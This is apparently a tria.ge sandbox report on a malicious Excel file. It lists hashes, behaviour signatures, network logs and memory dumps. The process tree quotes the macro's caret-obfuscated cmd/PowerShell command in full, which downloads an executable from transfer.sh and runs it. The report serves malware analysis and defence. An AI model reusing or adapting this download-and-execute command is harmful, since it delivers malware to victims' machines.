Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

bc127ab9ae...b5.xls

windows7-x64

10

bc127ab9ae...b5.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/10/2023, 23:54 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bc127ab9ae2605214e214b69cda0597477f8bc4b903d5215dd9e221cda0991b5.xls

  • Size

    100KB

  • MD5

    5014be5bf154ed9bbfe3b5868ad702d1

  • SHA1

    1ccadf970129812badcb86515d286ff1d6dd5200

  • SHA256

    bc127ab9ae2605214e214b69cda0597477f8bc4b903d5215dd9e221cda0991b5

  • SHA512

    486ae1acfb7c80b279dcdcf254d4e797ed6e7d146f2de5634584e4d995944ab6923ab747733bea85ae0bb39fa1be468e5f74cb9fd010e09a69c59279bbeed3a2

  • SSDEEP

    3072:5rxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAQtJE2zuxq+fr9wBLa71ba2ryLTHeYE:BxEtjPOtioVjDGUU1qfDlavx+W2QnAsF

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\bc127ab9ae2605214e214b69cda0597477f8bc4b903d5215dd9e221cda0991b5.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3244
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/JWNONUaUMt/Egrome.e^xe -o C:\Users\Public\z3usy.exe;C:\Users\Public\z3usy.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2904
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/JWNONUaUMt/Egrome.exe -o C:\Users\Public\z3usy.exe;C:\Users\Public\z3usy.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3204

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    46.28.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    46.28.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    133.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    254.109.26.67.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    254.109.26.67.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    43.58.199.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.58.199.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    54.120.234.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    54.120.234.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    59.128.231.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    59.128.231.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.154.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.154.82.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    23.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.173.189.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    134.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    134.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    29.81.57.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    29.81.57.23.in-addr.arpa
    IN PTR
    Response
    29.81.57.23.in-addr.arpa
    IN PTR
    a23-57-81-29deploystaticakamaitechnologiescom
  • flag-us
    DNS
    transfer.sh
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    transfer.sh
    IN A
    Response
    transfer.sh
    IN A
    144.76.136.153
  • flag-de
    GET
    https://transfer.sh/get/JWNONUaUMt/Egrome.exe
    powershell.exe
    Remote address:
    144.76.136.153:443
    Request
    GET /get/JWNONUaUMt/Egrome.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
    Host: transfer.sh
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/plain; charset=utf-8
    Retry-After: Fri, 13 Oct 2023 00:45:12 GMT
    Server: Transfer.sh HTTP Server
    X-Content-Type-Options: nosniff
    X-Made-With: <3 by DutchCoders
    X-Ratelimit-Key: 154.61.71.13
    X-Ratelimit-Limit: 10
    X-Ratelimit-Rate: 600
    X-Ratelimit-Remaining: 9
    X-Ratelimit-Reset: 1697150712
    X-Served-By: Proudly served by DutchCoders
    Date: Thu, 12 Oct 2023 22:45:06 GMT
    Content-Length: 10
  • flag-us
    DNS
    153.136.76.144.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    153.136.76.144.in-addr.arpa
    IN PTR
    Response
    153.136.76.144.in-addr.arpa
    IN PTR
    transfersh
  • flag-us
    DNS
    208.194.73.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    208.194.73.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    1.202.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.202.248.87.in-addr.arpa
    IN PTR
    Response
    1.202.248.87.in-addr.arpa
    IN PTR
    https-87-248-202-1amsllnwnet
  • flag-us
    DNS
    13.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    146.78.124.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    146.78.124.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    158.240.127.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    158.240.127.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    169.117.168.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    169.117.168.52.in-addr.arpa
    IN PTR
    Response
  • 144.76.136.153:443
    https://transfer.sh/get/JWNONUaUMt/Egrome.exe
    tls, http
    powershell.exe
    878 B
     4.9kB
     9
    7

    HTTP Request

    GET https://transfer.sh/get/JWNONUaUMt/Egrome.exe

    HTTP Response

    404
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
     90 B
     1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    46.28.109.52.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    46.28.109.52.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    360 B
     5

    DNS Request

    11.227.111.52.in-addr.arpa

    DNS Request

    11.227.111.52.in-addr.arpa

    DNS Request

    11.227.111.52.in-addr.arpa

    DNS Request

    11.227.111.52.in-addr.arpa

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    133.32.126.40.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    133.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    254.109.26.67.in-addr.arpa
    dns
    72 B
     126 B
     1
    1

    DNS Request

    254.109.26.67.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    43.58.199.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    43.58.199.20.in-addr.arpa

  • 8.8.8.8:53
    54.120.234.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    54.120.234.20.in-addr.arpa

  • 8.8.8.8:53
    59.128.231.4.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    59.128.231.4.in-addr.arpa

  • 8.8.8.8:53
    241.154.82.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    241.154.82.20.in-addr.arpa

  • 8.8.8.8:53
    23.173.189.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    23.173.189.20.in-addr.arpa

  • 8.8.8.8:53
    134.32.126.40.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    134.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    29.81.57.23.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    29.81.57.23.in-addr.arpa

  • 8.8.8.8:53
    transfer.sh
    dns
    powershell.exe
    57 B
     73 B
     1
    1

    DNS Request

    transfer.sh

    DNS Response

    144.76.136.153

  • 8.8.8.8:53
    153.136.76.144.in-addr.arpa
    dns
    73 B
     98 B
     1
    1

    DNS Request

    153.136.76.144.in-addr.arpa

  • 8.8.8.8:53
    208.194.73.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    208.194.73.20.in-addr.arpa

  • 8.8.8.8:53
    157.123.68.40.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    157.123.68.40.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    1.202.248.87.in-addr.arpa
    dns
    71 B
     116 B
     1
    1

    DNS Request

    1.202.248.87.in-addr.arpa

  • 8.8.8.8:53
    13.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    13.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    146.78.124.51.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    146.78.124.51.in-addr.arpa

  • 8.8.8.8:53
    158.240.127.40.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    158.240.127.40.in-addr.arpa

  • 8.8.8.8:53
    169.117.168.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    169.117.168.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qv0rhb41.tr4.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/3204-50-0x00007FFD67480000-0x00007FFD67F41000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3204-43-0x000001CBD6400000-0x000001CBD6BA6000-memory.dmp

    Filesize

    7.6MB

    Download

  • memory/3204-41-0x000001CBBD0B0000-0x000001CBBD0C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3204-42-0x000001CBBD0B0000-0x000001CBBD0C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3204-40-0x00007FFD67480000-0x00007FFD67F41000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3204-38-0x000001CBBD0C0000-0x000001CBBD0E2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3244-7-0x00007FFD92AD0000-0x00007FFD92CC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3244-28-0x000001C79C490000-0x000001C79D460000-memory.dmp

    Filesize

    15.8MB

    Download

  • memory/3244-9-0x00007FFD92AD0000-0x00007FFD92CC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3244-10-0x00007FFD92AD0000-0x00007FFD92CC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3244-11-0x00007FFD92AD0000-0x00007FFD92CC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3244-12-0x00007FFD50730000-0x00007FFD50740000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3244-13-0x00007FFD50730000-0x00007FFD50740000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3244-26-0x000001C79C490000-0x000001C79D460000-memory.dmp

    Filesize

    15.8MB

    Download

  • memory/3244-27-0x000001C79C490000-0x000001C79D460000-memory.dmp

    Filesize

    15.8MB

    Download

  • memory/3244-3-0x00007FFD52B50000-0x00007FFD52B60000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3244-8-0x00007FFD52B50000-0x00007FFD52B60000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3244-1-0x00007FFD92AD0000-0x00007FFD92CC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3244-5-0x00007FFD92AD0000-0x00007FFD92CC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3244-6-0x00007FFD52B50000-0x00007FFD52B60000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3244-4-0x00007FFD92AD0000-0x00007FFD92CC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3244-2-0x00007FFD52B50000-0x00007FFD52B60000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3244-46-0x000001C79C490000-0x000001C79D460000-memory.dmp

    Filesize

    15.8MB

    Download

  • memory/3244-49-0x000001C79C490000-0x000001C79D460000-memory.dmp

    Filesize

    15.8MB

    Download

  • memory/3244-0-0x00007FFD52B50000-0x00007FFD52B60000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3244-51-0x000001C79C490000-0x000001C79D460000-memory.dmp

    Filesize

    15.8MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.